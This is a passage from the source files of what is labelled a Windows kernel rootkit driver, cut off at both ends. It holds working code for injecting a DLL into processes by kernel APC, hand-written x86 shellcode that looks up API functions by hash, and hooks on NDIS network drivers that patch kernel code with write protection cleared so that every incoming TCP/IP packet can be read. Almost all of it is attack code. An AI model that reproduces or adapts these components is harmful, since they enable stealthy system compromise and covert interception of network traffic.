((PUCHAR)&pHeaders->OptionalHeader + pHeaders->FileHeader.SizeOfOptionalHeader); for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++) { RtlCopyMemory( RVATOVA(Image, pSection->VirtualAddress), RVATOVA(Data, pSection->PointerToRawData), min(pSection->SizeOfRawData, pSection->Misc.VirtualSize) ); pSection++; } // parse image base relocations if (RuntimeProcessRelocs(Image, Image)) { *pRetImage = Image; return TRUE; } } __except(EXCEPTION_EXECUTE_HANDLER) { DbgMsg(__FUNCTION__"() EXCEPTION\n"); } ZwFreeVirtualMemory(hProcess, &Image, 0, MEM_RELEASE); } else { DbgMsg("ZwAllocateVirtualMemory() fails; status: 0x%.8x\n", ns); } return NULL; } //-------------------------------------------------------------------------------------- BOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize) { #ifdef USE_PARANOID_CHEKS if (m_KTHREAD_ApcState < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return FALSE; } #endif // USE_PARANOID_CHEKS BOOLEAN bRet = FALSE; HANDLE hProcess = NULL; // get handle to the target process NTSTATUS ns = ObOpenObjectByPointer( Process, OBJ_KERNEL_HANDLE, NULL, 0, NULL, KernelMode, &hProcess ); if (NT_SUCCESS(ns)) { PROCESS_BASIC_INFORMATION ProcessInfo; // get address of PEB ns = ZwQueryInformationProcess( hProcess, ProcessBasicInformation, &ProcessInfo, sizeof(ProcessInfo), NULL ); if (!NT_SUCCESS(ns)) { DbgMsg("ZwQueryInformationProcess() fails; status: 0x%.8x\n", ns); goto close; } // attach to the process address space KAPC_STATE ApcState; KeStackAttachProcess(Process, &ApcState); // get process image base from peb PVOID ProcessImageBase = *(PVOID *)((PUCHAR)ProcessInfo.PebBaseAddress + PEB_IMAGE_BASE_OFFEST); // map DLL image into the target process PVOID Image = NULL; if (ImjectMapDllImage(hProcess, Data, DataSize, &Image)) { __try { PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA( Image, ((PIMAGE_DOS_HEADER)Data)->e_lfanew ); PVOID ImageEntryPoint = RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint); DbgMsg(__FUNCTION__"(): Image entry point is at "IFMT"\n", ImageEntryPoint); PINJ_THREAD_STRUCT InjectStruct = NULL; ULONG ShellCodeSize = GetShellcodeSize(inj_shellcode); ULONG InjectStructSize = sizeof(INJ_THREAD_STRUCT) + ShellCodeSize; // allocate memory for callgate NTSTATUS ns = ZwAllocateVirtualMemory( hProcess, (PVOID *)&InjectStruct, 0, &InjectStructSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (NT_SUCCESS(ns)) { DbgMsg("Callgate allocated at "IFMT"\n", InjectStruct); RtlFillMemory(InjectStruct, InjectStructSize, 0x90); #define DLL_PROCESS_ATTACH 0x01 #define REL_OP(_to_, _from_) \ \ (ULONG)((PUCHAR)&InjectStruct->##_to_ - \ (PUCHAR)&InjectStruct->##_from_) - sizeof(ULONG) #ifdef _X86_ InjectStruct->u0_0x68 = 0x68; /* PUSH Image */ InjectStruct->Image = (ULONG)Image; InjectStruct->u1_0xE8 = 0xE8; /* CALL ProcessModuleImports */ InjectStruct->ShellCodeAddr = REL_OP(ShellCode, ShellCodeAddr); InjectStruct->u2_0xC085 = 0xC085; /* TEST EAX, EAX */ InjectStruct->u3_0x840F = 0x840F; /* JZ Exit */ InjectStruct->ExitAddr = REL_OP(u8_0xC2, ExitAddr); InjectStruct->u4_0x68 = 0x68; /* PUSH 0 */ InjectStruct->param_Reserved = 0; InjectStruct->u5_0x68 = 0x68; /* PUSH DLL_PROCESS_ATTACH */ InjectStruct->param_Reason = DLL_PROCESS_ATTACH; InjectStruct->u6_0x68 = 0x68; /* PUSH ModuleInstance */ InjectStruct->ModuleInstance = (ULONG)Image; InjectStruct->u7_0xE8 = 0xe8; /* CALL ImageEntryPoint */ InjectStruct->ImageEntryPoint = (ULONG)((PUCHAR)ImageEntryPoint - (PUCHAR)&InjectStruct->ImageEntryPoint) - sizeof(ULONG); InjectStruct->u8_0xC2 = 0xc2; /* RET 3 */ InjectStruct->param_local_size = 3; #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ // copy shellcode, that processing module imports RtlCopyMemory(&InjectStruct->ShellCode, inj_shellcode, ShellCodeSize); KAPC Apc; PKAPC_STATE pThreadApcState = (PKAPC_STATE)((PUCHAR)Thread + m_KTHREAD_ApcState); KeInitializeApc( &Apc, Thread, OriginalApcEnvironment, &InjectKernelApcRoutine, NULL, (PKNORMAL_ROUTINE)InjectStruct, UserMode, NULL ); // enable user APC delivering pThreadApcState->UserApcPending = TRUE; // add routine to the APC queue if (KeInsertQueueApc(&Apc, NULL, NULL, 0)) { LARGE_INTEGER Timeout; Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(1)); // waiting for APC completion ns = KeWaitForSingleObject(&m_ApcEvent, Executive, KernelMode, FALSE, &Timeout); if (ns == STATUS_TIMEOUT) { DbgMsg(__FUNCTION__"(): Error while delivering APC\n"); } else if (NT_SUCCESS(ns)) { DbgMsg(__FUNCTION__"(): APC delivered!\n"); bRet = TRUE; } // sleep for 1 sec. KeDelayExecutionThread(KernelMode, FALSE, &Timeout); } else { DbgMsg("KeInsertQueueApc() ERROR\n"); } } else { DbgMsg("ZwAllocateVirtualMemory() fails; status: 0x%.8x\n", ns); } } __except(EXCEPTION_EXECUTE_HANDLER) { DbgMsg(__FUNCTION__"() EXCEPTION\n"); } } KeUnstackDetachProcess(&ApcState); close: ZwClose(hProcess); } else { DbgMsg("ObOpenObjectByPointer() fails; status: 0x%.8x\n", ns); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize) { BOOLEAN bRet = FALSE; PEPROCESS Process = NULL; PKTHREAD Thread = NULL; // lookup for process by name if (InjectFindProcess(ProcessName, 0, &Thread, &Process)) { // perform DLL injection bRet = InjectIntoProcess(Process, Thread, Data, DataSize); ObDereferenceObject(Process); ObDereferenceObject(Thread); } else { DbgMsg(__FUNCTION__"() ERROR: Unable to find process \"%ws\"\n", ProcessName); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize) { BOOLEAN bRet = FALSE; PEPROCESS Process = NULL; PKTHREAD Thread = NULL; // lookup for process by ID if (InjectFindProcess(NULL, ProcessId, &Thread, &Process)) { // perform DLL injection bRet = InjectIntoProcess(Process, Thread, Data, DataSize); ObDereferenceObject(Process); ObDereferenceObject(Thread); } else { DbgMsg(__FUNCTION__"() ERROR: Unable to find process PID=%d\n", ProcessId); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN InjectInitialize(void) { RTL_OSVERSIONINFOEXW VersionInformation; VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation); if (!NT_SUCCESS(RtlGetVersion((PRTL_OSVERSIONINFOW)&VersionInformation))) { return FALSE; } if (VersionInformation.dwMajorVersion == 5 && VersionInformation.dwMinorVersion == 1) { // XP SDT_NtProtectVirtualMemory = 0x0089; #ifdef _X86_ m_KTHREAD_ApcState = 0x34; #endif } else if ( VersionInformation.dwMajorVersion == 5 && VersionInformation.dwMinorVersion == 2) { // Server 2003 SDT_NtProtectVirtualMemory = 0x008f; #ifdef _X86_ m_KTHREAD_ApcState = 0x28; #endif if (VersionInformation.wServicePackMajor == 0 && VersionInformation.wServicePackMinor == 0) { // Service Pack 0, special case #ifdef _X86_ m_KTHREAD_ApcState = 0x34; #endif } } else if ( VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion == 0) { // Vista if (VersionInformation.wServicePackMajor == 0 && VersionInformation.wServicePackMinor == 0) { // Service Pack 0, special case SDT_NtProtectVirtualMemory = 0x00cf; } else { SDT_NtProtectVirtualMemory = 0x00d2; } #ifdef _X86_ m_KTHREAD_ApcState = 0x38; #endif } else if ( VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion == 1) { // 7 SDT_NtProtectVirtualMemory = 0x00d7; #ifdef _X86_ m_KTHREAD_ApcState = 0x40; #endif } else { DbgMsg(__FUNCTION__"() ERROR: Unknown NT version\n"); return FALSE; } DbgMsg("NtProtectVirtualMemory() SDT number is 0x%x\n", SDT_NtProtectVirtualMemory); KeInitializeEvent(&m_ApcEvent, SynchronizationEvent, FALSE); return TRUE; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/dll_inject.h ================================================ #ifdef _X86_ #define PEB_IMAGE_BASE_OFFEST 0x08 #elif _AMD64_ #define PEB_IMAGE_BASE_OFFEST 0x10 #endif /** * Callgate for execution library with CreateRemoteThread() */ #pragma pack(1) typedef struct _INJ_THREAD_STRUCT { // push ModuleBase UCHAR u0_0x68; ULONG Image; // call ProcessModuleImports UCHAR u1_0xE8; ULONG ShellCodeAddr; // test eax,eax USHORT u2_0xC085; // jz exit USHORT u3_0x840F; ULONG ExitAddr; // push param_1 UCHAR u4_0x68; ULONG param_Reserved; // push param_2 UCHAR u5_0x68; ULONG param_Reason; // push param_3 UCHAR u6_0x68; ULONG ModuleInstance; // call ImageEntryPoint UCHAR u7_0xE8; ULONG ImageEntryPoint; // retn 3 UCHAR u8_0xC2; USHORT param_local_size; UCHAR ShellCode[]; } INJ_THREAD_STRUCT, *PINJ_THREAD_STRUCT; #pragma pack() NTSTATUS NTAPI _ZwProtectVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection ); BOOLEAN InjectInitialize(void); BOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize); BOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize); BOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize); ================================================ FILE: src/rootkit_driver/dll_inject_shellcode.h ================================================ #define EMIT(_data_) __asm __emit _data_ #define _ __asm __emit #define h_LoadLibraryA 0xA412FD89 #define h_GetProcAddress 0xF2509B84 #define h_LoadLibraryExA 0x04BF60E8 #define ENDM 'DNE~' /** * Shellcode for setting up library imports */ __declspec(naked) ULONG __stdcall inj_shellcode(PVOID Addr) { ULONG fLoadLibraryA, fGetProcAddress, bRet; __asm { push ebp mov ebp, esp sub esp, __LOCAL_SIZE pushad call _realloc _realloc: // calculate shellcode address pop ebx sub ebx, _realloc call _get_kernel_32 mov esi, eax push h_LoadLibraryExA push esi call _get_proc_addr // get address of KERNEL32.DLL push 0 push 0 lea ecx, [ebx + _kernel32_name] push ecx call eax mov esi, eax push h_LoadLibraryA push esi call _get_proc_addr mov fLoadLibraryA, eax push h_GetProcAddress push esi call _get_proc_addr mov fGetProcAddress, eax push fGetProcAddress push fLoadLibraryA mov eax, [ebp + 8] push eax call _process_imports mov bRet, eax popad mov eax, bRet mov esp, ebp pop ebp retn 0x04 _calc_hash: push ebp mov ebp, esp mov eax, [ebp + 8] push edx xor edx, edx _calc_hash_next: rol edx, 3 xor dl, [eax] inc eax cmp [eax], 0 jnz _calc_hash_next mov eax, edx pop edx pop ebp retn 4 _get_kernel_32: push esi xor eax, eax mov eax, fs:[0x30] js _find_kernel_9x mov eax, [eax + 0x0c] mov esi, [eax + 0x1c] lodsd mov eax, [eax + 0x8] jmp _find_kernel_end _find_kernel_9x: mov eax, [eax + 0x34] lea eax, [eax + 0x7c] mov eax, [eax + 0x3c] _find_kernel_end: pop esi ret _get_proc_addr: push ebp mov ebp, esp push ebx push esi push edi xor eax, eax mov ebx, [ebp + 0Ch] mov esi, [ebp + 8] mov edi, esi add esi, [esi + 3Ch] mov ecx, [esi + 78h] add ecx, edi mov edx, [ecx + 1ch] push edx mov edx, [ecx + 24h] push edx mov esi, [ecx + 20h] add esi, edi cdq dec edx _next_func: lodsd inc edx add eax, [ebp + 8] push eax call _calc_hash cmp eax, ebx jnz _next_func mov eax, [ebp + 8] xchg eax, edx pop esi add esi, edx shl eax, 1 add eax, esi xor ecx, ecx movzx ecx, word ptr [eax] pop edi shl ecx, 2 add ecx, edx add ecx, edi mov eax, [ecx] add eax, edx pop edi pop esi pop ebx pop ebp retn 8 _process_imports: push ebp mov ebp, esp sub esp, 0x10 push ebx mov ebx, [ebp + 8] test ebx, ebx push esi push edi je _l067 mov eax, [ebx + 0x3c] mov edi, [eax + ebx + 0x80] add edi, ebx jmp _l058 _l013: mov eax, [edi + 0xc] add eax, ebx mov [ebp - 4], eax push [ebp - 4] call [ebp + 0x0c] mov [ebp + 8], eax cmp dword ptr [ebp + 8], 0 je _l067 cmp dword ptr [edi + 4], -1 jnz _l025 mov eax, [edi] jmp _l026 _l025: mov eax, [edi + 0x10] _l026: mov [ebp - 4], eax lea esi,[eax + ebx] jmp _l055 _l029: mov eax, [esi] test eax, 0xf0000000 je _l040 and eax, 0x0ffff mov [ebp - 8], eax push [ebp - 8] push [ebp + 8] call [ebp + 0x10] mov [ebp - 0x0c], eax mov eax, [ebp - 0x0c] jmp _l047 _l040: lea eax, [eax + ebx + 2] mov [ebp - 8], eax push [ebp - 8] push [ebp + 8] call [ebp + 0x10] mov [ebp - 0x10], eax mov eax, [ebp - 0x10] _l047: test eax, eax mov [esi], eax je _l067 mov eax, [edi + 0x10] sub eax, [ebp - 4] mov ecx, [esi] mov [eax + esi], ecx add esi, 4 _l055: cmp dword ptr [esi], 0 jnz _l029 add edi, 0x14 _l058: cmp dword ptr [edi], 0 jnz _l013 xor eax, eax inc eax _l062: pop edi pop esi pop ebx leave retn 0x0c _l067: xor eax, eax jmp _l062 _kernel32_name: EMIT('k' _ 'e' _ 'r' _ 'n' _ 'e' _ 'l' _ '3' _ '2' _ 0) } // shellcode's end marker EMIT('~' _ 'E' _ 'N' _ 'D') } ================================================ FILE: src/rootkit_driver/ndis_hook.cpp ================================================ #include "stdafx.h" // NDIS version: 6.0 #define NDIS60 1 extern "C" { #include } #include "bogusproto.h" #pragma alloc_text(INIT, NdisHookProtocolFind) #pragma alloc_text(INIT, NdisHookProtocolEnumOpened) #pragma alloc_text(INIT, NdisHookOpenGetMiniport) #pragma alloc_text(INIT, NdisHookAllocJump) #pragma alloc_text(INIT, NdisHookSet) // field offsets for NDIS structures int NDIS_PROTOCOL_BLOCK_Name = -1, NDIS_PROTOCOL_BLOCK_OpenQueue = -1, NDIS_PROTOCOL_BLOCK_NextProtocol = -1, NDIS_OPEN_BLOCK_ProtocolNextOpen = -1, NDIS_OPEN_BLOCK_MiniportHandle = -1, NDIS_MINIPORT_BLOCK_InterruptEx = -1, NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler = -1, NDIS_INTERRUPT_BLOCK_MiniportDpc = -1; NDIS_HOOK_BUFFER_HANDLER m_Handler = NULL; //-------------------------------------------------------------------------------------- BOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler) { UINT NdisVersion = NdisGetVersion(); if (NdisVersion != 0x60014) { DbgMsg(__FUNCTION__"() ERROR: NDIS version 0x%x is not supported\n", NdisVersion); return FALSE; } m_Handler = Handler; #ifdef _X86_ NDIS_PROTOCOL_BLOCK_OpenQueue = 0x00c; NDIS_PROTOCOL_BLOCK_NextProtocol = 0x008; NDIS_PROTOCOL_BLOCK_Name = 0x024; NDIS_OPEN_BLOCK_ProtocolNextOpen = 0x0dc; NDIS_OPEN_BLOCK_MiniportHandle = 0x008; NDIS_MINIPORT_BLOCK_InterruptEx = 0x1c0; NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler = 0x19c; NDIS_INTERRUPT_BLOCK_MiniportDpc = 0x010; #endif return TRUE; } //-------------------------------------------------------------------------------------- PVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol) { #ifdef USE_PARANOID_CHEKS if (NDIS_PROTOCOL_BLOCK_Name < 0 || NDIS_PROTOCOL_BLOCK_NextProtocol < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return NULL; } #endif // USE_PARANOID_CHEKS PUCHAR Protocol = (PUCHAR)hBogusProtocol; // enumerate registered NDIS protocols while (Protocol) { PUNICODE_STRING ProtocolName = (PUNICODE_STRING)(Protocol + NDIS_PROTOCOL_BLOCK_Name); // find TCPIP protocol if (RtlEqualUnicodeString(ProtocolName, usProtocol, TRUE)) { return Protocol; } Protocol = *(PUCHAR *)(Protocol + NDIS_PROTOCOL_BLOCK_NextProtocol); } return NULL; } //-------------------------------------------------------------------------------------- PVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock) { #ifdef USE_PARANOID_CHEKS if (NDIS_PROTOCOL_BLOCK_OpenQueue < 0 || NDIS_OPEN_BLOCK_ProtocolNextOpen < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return NULL; } #endif // USE_PARANOID_CHEKS if (OpenBlock) { return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_ProtocolNextOpen); } else { return *(PVOID *)((PUCHAR)Protocol + NDIS_PROTOCOL_BLOCK_OpenQueue); } return NULL; } //-------------------------------------------------------------------------------------- PVOID NdisHookOpenGetMiniport(PVOID OpenBlock) { #ifdef USE_PARANOID_CHEKS if (NDIS_OPEN_BLOCK_MiniportHandle < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return NULL; } #endif // USE_PARANOID_CHEKS return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_MiniportHandle); } //-------------------------------------------------------------------------------------- NDIS_STATUS CopyNBLToBuffer(PNET_BUFFER_LIST NetBufferList, PVOID *pDest, PULONG pBytesCopied) { NDIS_STATUS Status = NDIS_STATUS_SUCCESS; PNET_BUFFER CurrentNetBuffer; __try { *pBytesCopied = 0; for (CurrentNetBuffer = NET_BUFFER_LIST_FIRST_NB(NetBufferList); CurrentNetBuffer != NULL; CurrentNetBuffer = NET_BUFFER_NEXT_NB(CurrentNetBuffer)) { PMDL CurrentMdl = NET_BUFFER_CURRENT_MDL(CurrentNetBuffer); PUCHAR pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority); if (pSrc == NULL) { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } // For the first MDL with data, we need to skip the free space pSrc += NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer); LONG CurrLength = MmGetMdlByteCount(CurrentMdl) - NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer); if (CurrLength > 0) { ULONG CopyLegth = *pBytesCopied + CurrLength; PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth); if (CopyBuff) { if (*pDest && *pBytesCopied > 0) { RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied); ExFreePool(*pDest); } // Copy the data. NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength); *pDest = CopyBuff; } else { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } *pBytesCopied += CurrLength; pDest += CurrLength; } CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl); while (CurrentMdl) { pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority); if (!pSrc) { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } CurrLength = MmGetMdlByteCount(CurrentMdl); if (CurrLength > 0) { ULONG CopyLegth = *pBytesCopied + CurrLength; PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth); if (CopyBuff) { if (*pDest && *pBytesCopied > 0) { RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied); ExFreePool(*pDest); } // Copy the data. NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength); *pDest = CopyBuff; } else { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } *pBytesCopied += CurrLength; pDest += CurrLength; } CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl); } } } __finally { } return Status; } //-------------------------------------------------------------------------------------- #ifdef _X86_ #pragma pack(push, 1) typedef struct _HOOK_STRUCT { UCHAR op1_0x58; /* POP EAX */ UCHAR op2_0x68; /* PUSH OldHandler */ PVOID OldHandler; UCHAR op3_0x68; /* PUSH OldHandlerContext */ PVOID OldHandlerContext; UCHAR op4_0x50; /* PUSH EAX */ UCHAR op5_0x68; /* PUSH Handler */ PVOID Handler; UCHAR op6_0xc3; /* RET */ } HOOK_STRUCT, *PHOOK_STRUCT; #pragma pack(pop) PVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler) { // allocate trampoline for hook handler calling PHOOK_STRUCT HookStruct = (PHOOK_STRUCT)ExAllocatePool(NonPagedPool, sizeof(HOOK_STRUCT)); if (HookStruct) { HookStruct->op1_0x58 = 0x58; HookStruct->op2_0x68 = 0x68; HookStruct->OldHandler = OldHandler; HookStruct->op3_0x68 = 0x68; HookStruct->OldHandlerContext = OldHandlerContext; HookStruct->op4_0x50 = 0x50; HookStruct->op5_0x68 = 0x68; HookStruct->Handler = Handler; HookStruct->op6_0xc3 = 0xc3; } return HookStruct; } #endif // _X86_ //-------------------------------------------------------------------------------------- #define JUMP_SIZE 6 PVOID NdisHookAllocJump(PVOID Address, PVOID Destination) { PVOID Image = NULL; PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation); if (Info) { for (ULONG i = 0; i < Info->NumberOfModules; i++) { // find image by address inside it if (Address > Info->Modules[i].ImageBase && Address < (PUCHAR)Info->Modules[i].ImageBase + Info->Modules[i].ImageSize) { Image = Info->Modules[i].ImageBase; break; } } ExFreePool(Info); } if (Image == NULL) { // unknown address return Destination; } PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader); UCHAR ZeroBytes[JUMP_SIZE]; RtlZeroMemory(ZeroBytes, sizeof(ZeroBytes)); // find the '.text' section for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++, pSection++) { if (!strcmp((char *)&pSection->Name, ".text") && (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) && !(pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE)) { // calculate the real size of section ULONG RealSize = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment); ULONG PaddingSize = RealSize - pSection->Misc.VirtualSize; if (PaddingSize > JUMP_SIZE) { // find section padding PUCHAR Padding = RVATOVA(Image, pSection->VirtualAddress + pSection->Misc.VirtualSize); for (ULONG p = PaddingSize - JUMP_SIZE; p != 0; p--) { PUCHAR Ptr = Padding + p; // check for zero bytes if (RtlCompareMemory(Ptr, ZeroBytes, JUMP_SIZE) == JUMP_SIZE) { ClearWp(); #ifdef _X86_ // allocate jump *(Ptr + 0) = 0x68; /* PUSH Destination */ *(PVOID *)(Ptr + 1) = Destination; *(Ptr + 1 + sizeof(PVOID)) = 0xc3; /* RET */ #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ SetWp(); return Ptr; } } } } } return Destination; } //-------------------------------------------------------------------------------------- typedef void (NTAPI * func_IndicateNetBufferListsHandler)( NDIS_HANDLE MiniportAdapterHandle, PNET_BUFFER_LIST NetBufferLists, NDIS_PORT_NUMBER PortNumber, ULONG NumberOfNetBufferLists, ULONG ReceiveFlags ); void IndicateNetBufferListsHandler( /***/ PVOID Reserved, func_IndicateNetBufferListsHandler OldHandler, /***/ NDIS_HANDLE MiniportAdapterHandle, PNET_BUFFER_LIST NetBufferLists, NDIS_PORT_NUMBER PortNumber, ULONG NumberOfNetBufferLists, ULONG ReceiveFlags) { // iterate NET_BUFFER_LIST PNET_BUFFER_LIST BufferList = NetBufferLists; while (BufferList) { PVOID Buff = NULL; ULONG BuffSize = 0; // get raw buffers data if (CopyNBLToBuffer(BufferList, &Buff, &BuffSize) == NDIS_STATUS_SUCCESS) { #ifdef DBG_NDIS_HOOK DbgMsg(__FUNCTION__"(): Miniport = "IFMT", Length = %d\n", MiniportAdapterHandle, BuffSize); #endif if (m_Handler) { // call the data handler m_Handler(MiniportAdapterHandle, Buff, BuffSize); } ExFreePool(Buff); } BufferList = NET_BUFFER_LIST_NEXT_NBL(BufferList); } // call original function OldHandler( MiniportAdapterHandle, NetBufferLists, PortNumber, NumberOfNetBufferLists, ReceiveFlags ); } typedef void (NTAPI * func_MiniportInterruptDPC)( NDIS_HANDLE MiniportInterruptContext, PVOID MiniportDpcContext, PVOID ReceiveThrottleParameters, PVOID NdisReserved2 ); void MiniportInterruptDPC( /***/ PVOID Miniport, func_MiniportInterruptDPC OldHandler, /***/ NDIS_HANDLE MiniportInterruptContext, PVOID MiniportDpcContext, PVOID ReceiveThrottleParameters, PVOID NdisReserved2) { PVOID Handler = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler); #ifdef DBG_NDIS_HOOK DbgMsg(__FUNCTION__"(): Miniport = "IFMT"\n", Miniport); #endif // allocate trampoline for hook handler calling PVOID HookStruct = NdisHookAlloc(Handler, NULL, IndicateNetBufferListsHandler); if (HookStruct) { // hook _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = HookStruct; } // call original function OldHandler( MiniportInterruptContext, MiniportDpcContext, ReceiveThrottleParameters, NdisReserved2 ); if (HookStruct) { // restore _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = Handler; ExFreePool(HookStruct); } } //-------------------------------------------------------------------------------------- ULONG NdisHookSet(PUCHAR PointerFixup) { #ifdef USE_PARANOID_CHEKS if (NDIS_MINIPORT_BLOCK_InterruptEx < 0 || NDIS_INTERRUPT_BLOCK_MiniportDpc < 0 || NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return 0; } #endif // USE_PARANOID_CHEKS ULONG Hooked = 0; NDIS_HANDLE hBogusProtocol = BogusProtocolRegister(); if (hBogusProtocol) { UNICODE_STRING usTcpIp; RtlInitUnicodeString(&usTcpIp, L"TCPIP"); // lookup the 'TCPIP' protocol PVOID Protocol = NdisHookProtocolFind(hBogusProtocol, &usTcpIp); if (Protocol) { DbgMsg(__FUNCTION__"(): \"TCPIP\" protocol address is "IFMT"\n", Protocol); // enumerate open miniports PVOID OpenBlock = NULL; while (OpenBlock = NdisHookProtocolEnumOpened(Protocol, OpenBlock)) { // get miniport address PVOID Miniport = NdisHookOpenGetMiniport(OpenBlock); if (Miniport) { DbgMsg(__FUNCTION__"(): Open block = "IFMT", Miniport = "IFMT"\n", OpenBlock, Miniport); // get _NDIS_INTERRUPT_BLOCK address PVOID InterruptEx = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_InterruptEx); if (InterruptEx == NULL) { continue; } // change _NDIS_INTERRUPT_BLOCK::MiniportDpc routine address PVOID MiniportDpc = *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc); if (MiniportDpc == NULL) { continue; } // allocate trampoline for hook handler calling PVOID HookStruct = NdisHookAlloc(MiniportDpc, Miniport, RECALCULATE_POINTER(MiniportInterruptDPC)); if (HookStruct) { // hook _NDIS_INTERRUPT_BLOCK::MiniportDpc *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc) = NdisHookAllocJump(MiniportDpc, HookStruct); DbgMsg(__FUNCTION__"(): Hooking MiniportDpc: "IFMT" -> "IFMT"\n", MiniportDpc, HookStruct); Hooked += 1; } } } } else { DbgMsg(__FUNCTION__"() ERROR: Unable to find \"TCPIP\" protocol\n"); } BogusProtocolUnregister(); } return Hooked; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/ndis_hook.h ================================================ typedef void (NTAPI * NDIS_HOOK_BUFFER_HANDLER)(PVOID MiniportHandle, PVOID Buffer, ULONG Size); extern "C" { BOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler); PVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol); PVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock); PVOID NdisHookOpenGetMiniport(PVOID OpenBlock); PVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler); PVOID NdisHookAllocJump(PVOID Address, PVOID Destination); ULONG NdisHookSet(PUCHAR PointerFixup); }; ================================================ FILE: src/rootkit_driver/network.cpp ================================================ #include "stdafx.h" //-------------------------------------------------------------------------------------- SHORT ChecksumEnd(ULONG Sum) { Sum = (Sum >> 16) + (Sum & 0xffff); Sum += (Sum >> 16); return (USHORT)(~Sum); } /* * Calculate checksum of a buffer. * @param Data Pointer to buffer with data. * @param Count Number of bytes in buffer. * @param Seed Previously calculated checksum (if any). * @return Checksum of buffer. */ ULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed) { register 